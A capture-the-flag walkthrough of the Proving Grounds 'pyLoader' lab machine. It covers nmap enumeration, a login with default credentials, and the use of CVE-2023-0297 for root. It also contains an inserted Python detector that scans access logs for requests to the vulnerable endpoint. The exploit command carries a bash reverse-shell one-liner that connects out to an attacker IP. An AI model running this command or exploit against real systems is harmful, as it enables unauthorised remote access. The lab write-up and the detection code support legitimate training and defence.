PG - pyLoader

In this walk through, we will be going through the pyLoader room from Proving Grounds. This room is rated as Intermediate on the platform and it consists of exploitation of pyLoad via CVE-2023-0297 to get root on the target. So, let’s get started without any delay.

pyLoader

Machine Info:

Title:       pyLoader
IP address:  192.168.169.29
Difficulty:  Intermediate
OS:          Linux
Description: pyLoader is an Intermediate Linux machine which is vulnerable to CVE-2023-0297 and requires its exploitation to get root.

Enumeration:

  • I started off with a regular aggressive nmap scan and found only two ports open – 22 (SSH) and 9666 (HTTP).

$ sudo nmap -A 192.168.236.26
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-07 20:54 IST

Nmap scan report for 192.168.236.26
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
9666/tcp open     http    CherryPy wsgiserver
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Cheroot/8.6.0
| http-title: Login - pyLoad 
|_Requested resource was /login?next=http://192.168.236.26:9666/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/7%OT=22%CT=1%CU=35039%PV=Y%DS=4%DC=T%G=Y%TM=65C3A0F9
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=10A%TI=Z%II=I%TS=A)SEQ(SP=10
OS:2%GCD=1%ISR=10A%TI=Z%TS=A)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11
OS:NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE8
OS:8%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)
OS:T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=N)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%
OS:IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=8522%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   201.36 ms 192.168.45.1
2   201.36 ms 192.168.45.254
3   202.21 ms 192.168.251.1
4   202.27 ms 192.168.236.26

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.58 seconds

nmap scan

  • Enumerated the web server running on port 9666 and found the pyLoad application running on it, with a login panel on the home page.

pyLoad application

  • Used the default username and password combination to log into the pyLoad backend successfully, and enumerated the running pyLoad version – 0.5.0.

pyLoad information

Exploitation & Getting root:

  • Looked for known exploits for the application version in question and found that it is vulnerable to CVE-2023-0297, a pre-authentication RCE vulnerability.

searchsploit pyload

  • Used the exploit below against the target, specifying the target host and port number along with the command to be executed, which was the bash reverse shell one-liner pointing at our listening IP and port. Once the execution completes, we receive a connection back at our netcat listener as root.

Exploit: https://github.com/JacobEbben/CVE-2023-0297

python3 exploit.py -t 192.168.236.26:9666 -c 'bash -i >& /dev/tcp/192.168.45.215/4444 0>&1' -I 192.168.45.215 -P 4444

firing exploit

got root
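The shell above comes back as root, which means the pyLoad service itself was running as root on this box; on the defensive side, the two things worth having are the service running as an unprivileged user and a way to spot attempts against this bug in the web server's access log. The following is an added example written for this walkthrough, not code from the exploit repository or from the pyLoad project: it parses combined-format access-log lines and flags requests to the endpoint named in the public CVE-2023-0297 description (the path is taken from the advisory, not from this page, and is an assumption here), scoring them higher when they are POSTs without a referer or come from a scripted client. The log sample is constructed and embedded inline so the script runs offline; replace it with your own log text when calling find_suspicious().

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in Apache "combined" format. They are
# NOT from the machine in this write-up: the IPs, timestamps, status codes and
# user agents are made up to mirror the scenario described above.
SAMPLE_LOG = """\
192.168.45.215 - - [07/Feb/2024:21:02:11 +0530] "GET /login?next=http://192.168.236.26:9666/ HTTP/1.1" 200 3412 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"
192.168.45.215 - - [07/Feb/2024:21:02:19 +0530] "POST /login HTTP/1.1" 302 209 "http://192.168.236.26:9666/login" "Mozilla/5.0 (X11; Linux x86_64) Firefox/121.0"
192.168.45.215 - - [07/Feb/2024:21:05:03 +0530] "POST /flash/addcrypted2 HTTP/1.1" 500 290 "-" "python-requests/2.31.0"
192.168.45.215 - - [07/Feb/2024:21:05:03 +0530] "POST /flash/addcrypted2 HTTP/1.1" 500 290 "-" "python-requests/2.31.0"
10.0.0.7 - - [07/Feb/2024:21:06:40 +0530] "GET /robots.txt HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"
"""

# One regex for the combined log format: client, identity, user, timestamp,
# request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoint named in the public description of CVE-2023-0297. Assumption: this
# value comes from the advisory, not from the write-up above; check it against
# the advisory for the pyLoad build you run.
VULNERABLE_ENDPOINTS = {"/flash/addcrypted2"}

# Clients that are not a browser; the legitimate Click'n'Load flow that uses
# this endpoint is driven from a browser, so scripted agents stand out.
SCRIPTED_UA = re.compile(r"^(python-requests|python-urllib|curl|wget|go-http-client)", re.I)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def find_suspicious(log_text):
    """Return one finding per (source IP, endpoint) for hits on the CVE endpoint.

    Each finding carries the hit count, the set of HTTP status codes seen and
    the reasons it was flagged, so an analyst can triage without re-reading
    the raw log.
    """
    hits = defaultdict(lambda: {"count": 0, "statuses": set(), "reasons": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["path"] not in VULNERABLE_ENDPOINTS:
            continue
        entry = hits[(rec["ip"], rec["path"])]
        entry["count"] += 1
        entry["statuses"].add(rec["status"])
        entry["reasons"].add("request to CVE-2023-0297 endpoint")
        if rec["method"] == "POST" and rec["referer"] == "-":
            entry["reasons"].add("POST without referer (not the browser flow)")
        if SCRIPTED_UA.match(rec["ua"]):
            entry["reasons"].add("scripted user agent: " + rec["ua"])
    return [
        {
            "ip": ip,
            "path": path,
            "count": e["count"],
            "statuses": sorted(e["statuses"]),
            "reasons": sorted(e["reasons"]),
        }
        for (ip, path), e in sorted(hits.items())
    ]


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(f"{finding['ip']} -> {finding['path']} x{finding['count']} "
              f"status={finding['statuses']}")
        for reason in finding["reasons"]:
            print("   -", reason)
```

The browser-driven login requests in the sample are left alone; only the two scripted POSTs to the CVE endpoint surface, grouped by source address. On a real deployment the same function can be run over a rotated log file, and the status set is worth keeping in the output because a 500 or an error body on that endpoint is exactly what a successful injection looks like in the public exploit flow.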

  • Captured the root flag and marked the machine as complete.

proof flag

Conclusion:

So that was “pyLoader” for you. We started off with a regular nmap scan and found two ports open – 22 (SSH) and 9666 (HTTP). Enumerated the web server running on port 9666 and found pyLoad running. Used the default username and password combination to log into the pyLoad backend successfully. In there, found out that it was running version 0.5.0. Looked for any known exploit and found that it is vulnerable to CVE-2023-0297. At last, used that to get root on the target. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
